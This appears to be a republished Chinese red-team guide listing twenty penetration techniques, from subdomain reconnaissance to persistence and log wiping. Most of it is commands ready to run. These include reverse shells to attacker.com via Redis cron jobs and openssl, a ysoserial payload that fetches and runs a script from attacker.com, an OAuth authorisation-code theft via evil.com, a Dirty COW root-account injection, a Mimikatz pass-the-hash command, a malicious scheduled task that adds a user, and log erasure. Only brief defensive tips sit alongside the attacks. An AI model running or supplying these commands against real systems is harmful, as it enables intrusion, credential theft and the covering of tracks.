在网络安全攻防对抗中,边界渗透是红队评估的关键突破口。本文基于ATT&CK框架与实战经验,系统梳理20个经过验证的渗透技巧,涵盖信息收集到权限维持全生命周期,每个技巧均包含工具链、操作步骤及防御建议。
第一章 信息收集篇
技巧1:多维度子域名测绘体系
技术细节:
-
1. 使用Amass进行被动信息收集:
amass enum -d example.com -config config.ini -o amass_results.txt
配置文件需集成Virustotal、Censys等API密钥提升扫描深度
-
2. 证书透明度日志深度利用:
import requeststarget = "example.com"url = f"https://crt.sh/?q=%.{target}&output=json"resp = requests.get(url).json()domains = {item['name_value'] for item in resp}
防御方案:
-
• 部署证书透明度监控工具CertStream -
• 禁用DNS泛解析,配置DNS监控告警规则
技巧2:CDN真实IP溯源技术
技术突破点:
-
1. 利用IPv6基础设施漏洞:
curl -6 http://target.com # 部分CDN未覆盖IPv6nmap -6 -Pn -sV --script=http-title target_ipv6
-
2. 邮件服务关联分析:
SELECT mx_records FROM domain_db WHERE domain='example.com'UNIONSELECT historical_ips FROM ssl_cert_db WHERE org_name='Example Inc.'
案例:2022年某电商平台通过MX记录溯源获取真实IP,成功突破云WAF防护
技巧3:非标端口服务指纹识别
技术升级:
-
1. 混合扫描方案:
masscan -p1-65535 10.0.0.0/24 --rate=100000 | tee masscan.outnmap -sV -sC -Pn -T4 -iL masscan.out -oA nmap_service_scan
-
2. 深度协议解析:
from scapy.allimport *packet = sniff(filter="tcp port 8443", count=10)hexdump(packet[0].load) # 识别自定义加密协议特征
技巧4:云元数据服务利用
攻击路径:
-
1. AWS元数据探测:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
-
2. 利用SSRF获取临时凭证:
GET/vulnerable?url=http://169.254.169.254/latest/meta-data/HTTP/1.1
防御加固:
// AWS IMDSv2配置{"HttpTokens":"required","HttpPutResponseHopLimit":1}
技巧5:员工信息社工库构建
数据来源:
-
• LinkedIn高级搜索语法: site:linkedin.com/in "Example Corp"
-
• GitHub代码库敏感信息扫描:
gitleaks detect --source=. -v
第二章 漏洞利用篇
技巧6:Web应用历史漏洞回溯
Wayback Machine深度利用:
-
1. 时间线分析:
import waybackurl = "example.com"snapshots = wayback.WaybackClient().search(url)for snapshot in snapshots:print(snapshot.timestamp, snapshot.url)
-
2. 敏感路径爆破:
wfuzz -c -z file,wordlist/general.txt --hc 404 https://web.archive.org/web/20200101/http://example.com/FUZZ
技巧7:SSRF漏洞链式利用
云环境组合攻击:
-
1. 阿里云Metadata利用:
GET/ssrf.php?url=http://100.100.100.200/latest/meta-data/HTTP/1.1
-
2. 内网Redis提权:
redis-cli -h 172.16.0.12 flushallecho -e "nn*/1 * * * * /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1nn" | redis-cli -x set 1redis-cli config setdir /var/spool/cron/
技巧8:OAuth 2.0配置缺陷利用
攻击流程:
-
1. 伪造回调地址:
GET /oauth/authorize?response_type=code&client_id=CLIENT_ID&redirect_uri=http://evil.com/callback
-
2. 窃取授权码:
from flask import request@app.route('/callback')defcallback(): code = request.args.get('code') requests.post('https://oauth.provider/token', data={'code': code,'client_secret': 'STEALED_SECRET' })
技巧9:API未授权访问漏洞
Swagger文档利用:
-
1. 接口枚举:
curl -s https://api.example.com/v2/api-docs | jq '.paths'
-
2. 敏感操作探测:
POST/api/v1/admin/usersHTTP/1.1{"username":"attacker","role":"superadmin"}
技巧10:反序列化漏洞利用
ysoserial高级用法:
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/shell.sh | bash' > payload.bincurl -X POST --data-binary @payload.bin http://vuln-app.com/deserialize
防御方案:
-
• 使用SafeObjectInputStream -
• 配置serialKiller过滤链
技巧11:容器逃逸漏洞利用
Docker逃逸实战:
-
1. 特权模式逃逸:
docker run --privileged -it alpinensenter --target 1 --mount --uts --ipc --net --pid
-
2. CVE-2021-30465利用:
./cdk run shim-pwn 8080
第三章 权限提升篇
技巧12:Windows服务路径劫持
自动化检测脚本:
Get-WmiObject win32_service | Where-Object {$_.PathName -match'".*?"'-and (Test-Path-Path ($_.PathName -split'"')[1])} | Select Name,PathName
防御加固:
icacls "C:Program Files" /deny "Everyone:(OI)(CI)(D,DC)"
技巧13:Linux SUID提权
自动化检测:
find / -perm -4000 2>/dev/null | xargs -l ls -la
脏牛漏洞利用:
./dirtyc0w /etc/passwd "attacker:x:0:0:root:/root:/bin/bashn"
技巧14:Windows计划任务劫持
实战步骤:
-
1. 检测可写任务目录:
accesschk.exe -wvcu "C:WindowsSystem32Tasks"
-
2. 创建恶意XML任务:
<?xml version="1.0"?><Task><Actions><Exec><Command>cmd.exe</Command><Arguments>/c net user attacker P@ssw0rd! /add</Arguments></Exec></Actions></Task>
技巧15:云实例Metadata提权
AWS临时凭证利用:
AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=... aws ec2 describe-instances
第四章 横向移动篇
技巧16:Pass-the-Hash攻击
Mimikatz实战:
sekurlsa::pth /user:Administrator /domain:corp /ntlm:e45e... /run:cmd.exe
防御检测:
-
• 启用Credential Guard -
• 监控Event ID 4624登录类型
技巧17:Kerberoasting攻击
自动化脚本:
Get-DomainUser-SPN | Request-SPNTicket-OutputFormat Hashcat
黄金票据防御:
Set-ADAccountPassword-Identity krbtgt -Reset-NewPassword (ConvertTo-SecureString-AsPlainText"新密码"-Force)
技巧18:RDP中间人攻击
Seth工具利用:
python seth.py eth0 3389 attacker_ip target_ip
第五章 权限维持篇
技巧19:隐蔽后门创建
Linux隐藏进程:
nohupmkfifo /tmp/.x; /bin/sh -i </tmp/.x 2>&1 | openssl s_client -quiet -connect attacker.com:443 >/tmp/.x &
Windows WMI事件订阅:
$filterArgs = @{...}$consumerArgs = @{CommandLineTemplate="powershell -enc JABzA..."}
技巧20:日志定向擦除技术
Windows日志清除:
wevtutil cl Security /r:dc01.corp.com
Linux痕迹清理:
find /var/log -type f -exec sed -i '/192.168.1.100/d' {} ;
第六章 防御体系构建
企业防护建议
-
1. 部署网络微分段策略:
interface GigabitEthernet0/1 switchport mode private-vlan
-
2. 启用EDR行为监控:
# Elastic检测规则示例alert:when:process.name:"mimikatz.exe"severity:CRITICAL
原文始发于微信公众号(HACK之道):20个边界渗透骚操作速成指南!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论